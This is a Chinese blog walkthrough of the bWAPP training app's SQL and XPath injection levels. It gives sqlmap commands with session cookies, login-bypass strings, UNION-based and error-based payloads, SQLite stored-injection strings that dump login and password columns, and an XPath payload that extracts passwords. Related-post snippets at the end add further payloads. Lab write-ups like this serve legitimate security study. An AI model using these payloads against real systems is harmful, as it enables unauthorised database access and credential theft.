bwapp sql部分

最新推荐文章于 2024-11-21 22:14:03 发布
最新推荐文章于 2024-11-21 22:14:03 发布
阅读量896 收藏 1
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/loseheart157/article/details/107974364
版权

文章目录

SQL Injection (GET/Search)

这里的题都可以用sqlmap解决
sqlmap详解,可以参考这篇文章

构造sqlmap -u "http://192.168.41.137/sqli_1.php?title=a&action=search" -p title --cookie "security_level=0; PHPSESSID=bsmemp4vk1015lbju2csqchr63"
这里需要加cooike值,靶场需要登录
然后就会自动构造
在这里插入图片描述

SQL Injection (GET/Select)

在这里插入图片描述
使用order by 尝试可知,能试到7,
使用联合查询试一下,可以,然后就开始查库,查表,查列

SQL Injection (POST/Search)

使用了post传参而已
解决方法和get一样

SQL Injection (POST/Select)

在这里插入图片描述
通过抓包可以知道,不仅是post传参,而且title改成了movie,
解决方法一样

SQL Injection (AJAX/JSON/jQuery)

首先解释一下AJAX,Ajax 即“Asynchronous Javascript And XML”(异步 JavaScript 和 XML),通过在后台与服务器进行少量数据交换,Ajax 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行更新。比如我们使用百度的时候,有个功能叫“搜索预测”,当你输入第一个字的时候,下拉框里就会出现大量可能的关键词候选,这个用的就是ajax技术,而它的返回值一般是json/xml格式的,jQuery中提供实现ajax的方法(因为js很容易捕捉客户端的按键行为)

在这里插入图片描述
抓包推断输入的aget传参方法,但
URL为sqli_10-2.php?title=a但是实际浏览器看到的页面是,sqli_10-1.php,观察源代码发现
在这里插入图片描述
sqli_10-1.php将参数通过getJSON方法传给sqli_10-2.php,sqli_10-2.php立马执行查询,所以真正的注入点在sqli_10-2.php的title参数
当然,sqlmap能解决

SQL Injection (CAPTCHA)

进入后,直接输点东西,观看url,即可知道点在哪里

SQL Injection (Login Form/Hero)

在这里插入图片描述
用sql语句构造绕过,
admin
aa ' or 'a' = 'a
这是我采用的一种写法
在这里插入图片描述
用sqlmap的话,
这样构造
sqlmap -u "http://192.168.248.130/bWAPP/sqli_3.php" --data "login=111&password=111&form=submit" --cookie "security_level=0; PHPSESSID=5913f596beeaf73e40495ff8037750a9" -p login
用给定的payload进行post注入

SQL Injection (Login Form/User)

在这里插入图片描述
order by 先爆破
当为9的时候
在这里插入图片描述
当为10的时候,
在这里插入图片描述
因此我们就可以相信他是9
' UNION SELECT 1,2,3,4,5,6,7,8,9#在使用联合查询爆破回显位
但尝试后感觉不行,最后搜索到的大佬是这样写的
' UNION SELECT 1,2,'356a192b7913b04c54574d18c28d46e6395428ab',4,5,6,7,8,9#
原因http://www.mamicode.com/info-detail-2239051.html

SQL Injection (SQLite)

SQLite 简介

SQLite是一个软件库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL
数据库引擎。SQLite是一个增长最快的数据库引擎,这是在普及方面的增长,与它的尺寸大小无关。SQLite 源代码不受版权限制。

sqlmap可以解决

SQL Injection - Stored (Blog)

在这里插入图片描述
用sqlmap将post参数加上去

SQL Injection - Stored (SQLite)

meetsec’,’’);
meetsec’,sqlite_version());
meetsec’,(select name from sqlite_master where type=‘table’));
meetsec’,(select login||":"||password from users)) – -
新的独立的注入方法

SQL Injection - Stored (User-Agent)

在这里插入图片描述
抓包,修改UA为单引号,出现报错
继续
1' ,(select version()))#
1' ,(select user()))#,这样都可以查询到
在这里插入图片描述

SQL Injection - Stored (XML)

构造post参数
<reset><login>bee'+(select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'</login><secret>bee'+(select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'</secret></reset>

在这里插入图片描述

XML/XPath Injection (Login Form)

XPath其实和sql查询挺像,区别在于sql查询是在数据库中查数据,Xpath是在xml中找信息,既然如此只要熟悉一下Xpath的语法,知道它的特点即可找到对应的注入思路

在 XPath 中,有七种类型的节点:元素、属性、文本、命名空间、处理指令、注释以及文档节点(或称为根节点)。节点之间存在父、子、先辈、后代、同胞关系,以t3stt3st.xml为例
根节点<root1> 、元素节点<user><username><key><hctfadmin>、属性节点name='user1'
<root1><user><htcfadmin>的父节点,同时也是<user><hctfadmin><username><key>的先辈。和是同胞节点。

在这里插入图片描述
构造meetset' or '1'='1,成功

在这里插入图片描述

XML/XPath Injection (Search)

在这里插入图片描述
$xml = simplexml_load_file(“passwords/heroes.xml”);

// XPath search
// $result = x m l − > x p a t h ( " / / h e r o [ g e n r e = ′ xml->xpath("//hero[genre = ' xml>xpath("//hero[genre=genre’]/movie");
$result = x m l − > x p a t h ( " / / h e r o [ c o n t a i n s ( g e n r e , ′ xml->xpath("//hero[contains(genre, ' xml>xpath("//hero[contains(genre,genre’)]/movie");

那么我们补全我们需要但他所缺乏的
构造payload')]/password | a[contains(a,'
这样完整的语句就是
$result = $xml->xpath("//hero[contains(genre, '')]/password | a[contains(a,'')]/movie");

$result = $xml->xpath("//hero/password");

bWAPPSQL注入思路
qq_37019068的博客
10-09 1484
bWAPPSQL注入思路 SQL Injection (GET/Search) 等级:low 首先看看正常搜索的情况,这里我输入了一个字母b,可以看出来他把标题带有b的电影信息全都给搜出来了 在这里我猜想其构成SQL语句的代码: $sql = "select * from table where Title like '%" . $name . "%'" 接下来为了验证猜想,我输入了一个单引号 返回了一个报错,直接证明了服务器未对单引号进行过滤,意味着我们可以使用单引号进行SQL语句的闭合控制,且也
bWAPPSQL注入实战
最新发布
善恶终有报,天道好轮回;不信抬头看,苍天饶过谁
12-16 1606
我生来就是高山而非溪流 ,我欲于群峰之巅俯视平庸的沟壑。我生来就是人杰而非草芥,我站在伟人之肩藐视卑微的懦夫!
bWAPP -- SQL Injection
hee_mee的博客
09-19 310
zeroNIL
bWAPP-SQLiInsert
hee_mee的博客
09-26 266
zeronil
bWApp SQL 注入
Yanug
09-26 1243
1.可以显示的字段 1' union select 1,2,3,4,5,6,7# 2.对mysql用户名主机名,当前数据库的版本信息,当前数据库名称,数据库路径等进行查询和显示。 1' union select 1,user(),version(),database(),5,6,7# 3.当前数据库下面的表名: 1' union select 1,table_name,table_sche...
bWAPP SQL注入篇
angry_program的博客
03-03 7688
步骤 下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入,注入是字符型还是整数型 2.猜解SQL查询语句中的字段数 (order by ) 3.确定显示的字段顺序 4.获取当前数据库 (爆库) 5.获取数据库中的表 (爆表) 6.获取表中的字段名 (爆字段) 7.下载数据 (爆数据) 0x01SQL Injection (GET/Search) ...
bwapp通关教程
qq_45756971的博客
11-01 6741
** HTML Injection - Reflected (GET) ** low: 低级漏洞中,输入数据没有做校验 First name: <script>alert( 'xss' )</script> Last name: <script>alert( 'xss' )</script> 出现xss即为成功。 medium 和low一样,但发现被全部显示 抓包,会发现符号<>均被编码 0,1,2分别对应三个等级 找见对应的/bWAPP/bw
bWAPP V2.2:第1课:下载并准备bWAPP虚拟机
11-17
根据提供的部分内容,我们可以详细地介绍如何下载并准备bWAPP虚拟机: 1. **下载7-Zip(前提条件)** - 如果7-Zip已经安装在您的主机系统中,则可以跳过此步骤。 - 如果尚未安装,可以通过以下步骤完成下载: 1...
20210118bwapp server inject 全难度通关详解
qq_45290991的博客
02-02 1261
这是HTML 注入的姐妹篇,接着这一篇博客之后来的,要看bwapp 的HTML inject 可以参考这篇博客: 20210113bwapp html inject 全难度通关详解 服务端类型的注入,主要包括bwapp的以下几类(不包括SQL注入,打算单独拿出来写): 那我们就从第一个LDAP注入开始吧! 一、LDAP Connection Settings(LDAP inject) 在此之前我没学过LDAP,是从这几个博客学的入门: https://cloud.tencent.com/dev
bWAPPSQL Injection(GET/Search)
waZTG的博客
11-21 1095
文章主要介绍了两种获取数据库相关信息的方法。第一种先是阐述获取当前连接数据库名、所有表、特定表(如 users 表)所有字段以及用户名和密码的具体 SQL 语句操作,通过修改语句中的 limit 等参数逐步查找所需内容。第二种同样围绕获取数据库名、用户名、所有表、特定表字段以及用户名和密码展开,给出对应的 SQL 语句构造形式,还提及在获取密码时有 32 位的限制情况及相应处理语句,整体聚焦数据库信息提取相关的技术操作内容。
BWAPP(buggy web Application)
02-01
buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵 盖了所有主要的已知Web漏洞,包括OWASP Top10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。
bWAPP_intro.pdf
01-30
BWAPP靶场环境介绍PPT,bWAPP包含了100多个漏洞环境,几乎涵盖了所有的漏洞类型。
bwapp靶场笔记 -SQL注入篇
m0_52149675的博客
10-30 1701
​启动靶场
BWAPPSQL注入通关
qq_43665434的博客
04-17 3220
1、SQL injection(GET/search) low 输入单引号直接报错,说明有注入点 直接order by二分法得出主查询字段数为7 直接union注入,测出回显点为2,3,4,5 查数据库信息: 测出数据库名为bwapp,用户为root,版本为5.5.53 查询表名: 查询字段名: 查字段值: 没有难度。 medium 尝试多种方法都不行,看了一眼源码: 发现是用addslashes()进行转义的,尝试了下宽字节绕过,也不行。 看了下原来数据库采用的是urf8编码,本来想改成g..
bwapp闯关(一)SQL injection<low>
weixin_44894271的博客
05-17 499
前言 本文章记录bwappSQL injection模块,web安全测试SQL注入 环境准备 docker部署bwapp火狐浏览器安装hackbar插件,登录进入bwapp页面,选择bug类型<SQL injection(GET/Search)>,并设置安全等级为low 按照字段搜索可以看到查询结果信息列表如下 单引号注入检测 根据搜索查询业务我们可以猜想查询用户信息列表的SQL大致为:select XX from database where title = “id”,此时titl
bwappSQL Injection(GET/Search)——low级别
用博客做做记录的小白
06-13 789
bwapp靶场sql注入关卡低级难度,采用手工注入和自动化注入两种方式实现sql注入。
SQL注入-bWAPP靶场-post
m0_62665450的博客
12-31 319
sql注入
学习web 安全笔记(第十三天)-作业,bwappsql注入判断
04-17 290
如果页面返回错误,说明这个单引号被带到了数据库的sql语句里去执行。因此可以判断有sql注入。字符串类型后面加 ' and '1'='1' , ' and '1'='2'然后输入 i ' and '1'='1 反馈no movies。注意:要推测后端sql语句的写法,尝试构造sql语句去闭合。可以降低攻击成功率,增加攻击成本。然后输入i',返回报错。可以后面加 and 1=1 ,and 1=2。查看bwapp环境源代码。
BWAPPsql注入部分详解
tianzhende_kun的博客
02-28 1092
可以看到, 联合查询3的位置对应password字段, 且password字段的值是经过md5加密过的, 由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等。注入语句IronMan' and if (length(database())=5,sleep(5),1) --1。' union select 1,2,3,4,5,6,7,8,9,10 # 报错。尝试万能密码: 1’ or 1=1 –- 1。尝试万能密码:1' or 1=1 -- 1。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值